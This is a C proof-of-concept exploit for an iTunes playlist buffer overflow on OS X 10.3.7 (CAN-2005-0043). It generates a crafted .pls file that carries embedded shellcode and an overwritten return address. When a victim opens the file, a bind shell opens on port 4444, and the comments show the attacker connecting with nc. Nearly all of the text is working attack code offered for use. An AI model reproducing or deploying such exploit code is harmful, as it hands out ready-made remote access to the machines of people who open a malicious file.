Apple iTunes Playlist Buffer Overflow Proof of Concept ExploitCAN-2005-0043
/*
* PoC for iTunes on OS X 10.3.7
* -( nemo@felinemenace.org )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( nemo@felinemenace.org )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include <stdio.h>
#include <strings.h>
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";
int main(int ac, char **av)
{
int n,*p;
unsigned char * q;
char buf[BUFSIZE];
FILE *pls;
int offset=0x3DA8;
char playlist[] = {
"[playlist]\n"
"NumberOfEntries=1\n"
"File1=http://"
};
printf("-( fm-eyetewnz )-\n");
printf("-( nemo@felinemenace.org )-\n");
memset(buf,'\x60',BUFSIZE);
bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
q = buf + sizeof(buf) - 5;
p = (int *)q;
if(!(av[1])) {
printf("usage: %s <filename (.pls)> [offset]\n",*av);
exit(1);
}
if(av[2])
offset = atoi(av[2]);
*p = (0xc0000000 - offset);// 0xbfffc258;
if(!(pls = fopen(*(av+1),"w+"))) {
printf("error opening file: %s.\n", *(av +1));
exit(1);
}
printf("Creating file: %s.\n",*(av+1));
printf("Bindshell on port: 4444\n");
fwrite(playlist,sizeof(playlist) - 1,1,pls);
fwrite(buf,sizeof(buf) - 1,1,pls);
fclose(pls);
}